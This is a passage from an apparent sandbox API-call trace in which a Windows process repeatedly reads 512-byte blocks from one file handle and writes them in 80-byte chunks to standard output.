hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) 
returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] GetFileType (hFile=0x4c) returned 0x1 [0162.783] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.783] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.783] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.784] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.784] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, 
lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.784] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.784] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, 
lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.785] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.785] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] GetFileType (hFile=0x4c) returned 0x1 [0162.785] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.785] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, 
lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] GetFileType (hFile=0x4c) returned 0x1 [0162.786] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.786] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.786] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.786] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.787] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] GetFileType (hFile=0x4c) returned 0x1 [0162.787] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.787] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.788] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.788] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] GetFileType (hFile=0x4c) returned 0x1 [0162.788] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.788] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, 
lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] GetFileType (hFile=0x4c) returned 0x1 [0162.789] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.789] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: 
lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.789] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.789] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.790] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0162.790] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.790] GetFileType (hFile=0x4c) returned 0x1 [0162.790] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.791] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.791] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] 
GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.791] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.791] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 
[0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.792] GetFileType (hFile=0x4c) returned 0x1 [0162.792] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] WriteFile (in: hFile=0x4c, lpBuffer=0x14f540*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f540*, lpNumberOfBytesWritten=0x14e544*=0x20, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.793] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x14e530 | out: lpNewFilePointer=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=4) returned 0x54 [0162.793] ReadFile (in: hFile=0x54, lpBuffer=0x14f360, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e550, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesRead=0x14e550*=0x200, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] WriteFile (in: hFile=0x4c, lpBuffer=0x14f360*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f360*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] WriteFile (in: hFile=0x4c, lpBuffer=0x14f3b0*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f3b0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.793] GetFileType (hFile=0x4c) returned 0x1 [0162.793] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f400*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f400*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f450*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f450*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4a0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4a0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] GetFileType (hFile=0x4c) returned 0x1 [0162.794] _get_osfhandle (_FileHandle=1) returned 0x4c [0162.794] WriteFile (in: hFile=0x4c, lpBuffer=0x14f4f0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x14e544, lpOverlapped=0x0 | out: lpBuffer=0x14f4f0*, lpNumberOfBytesWritten=0x14e544*=0x50, lpOverlapped=0x0) returned 1 [0162.794] _get_osfhandle 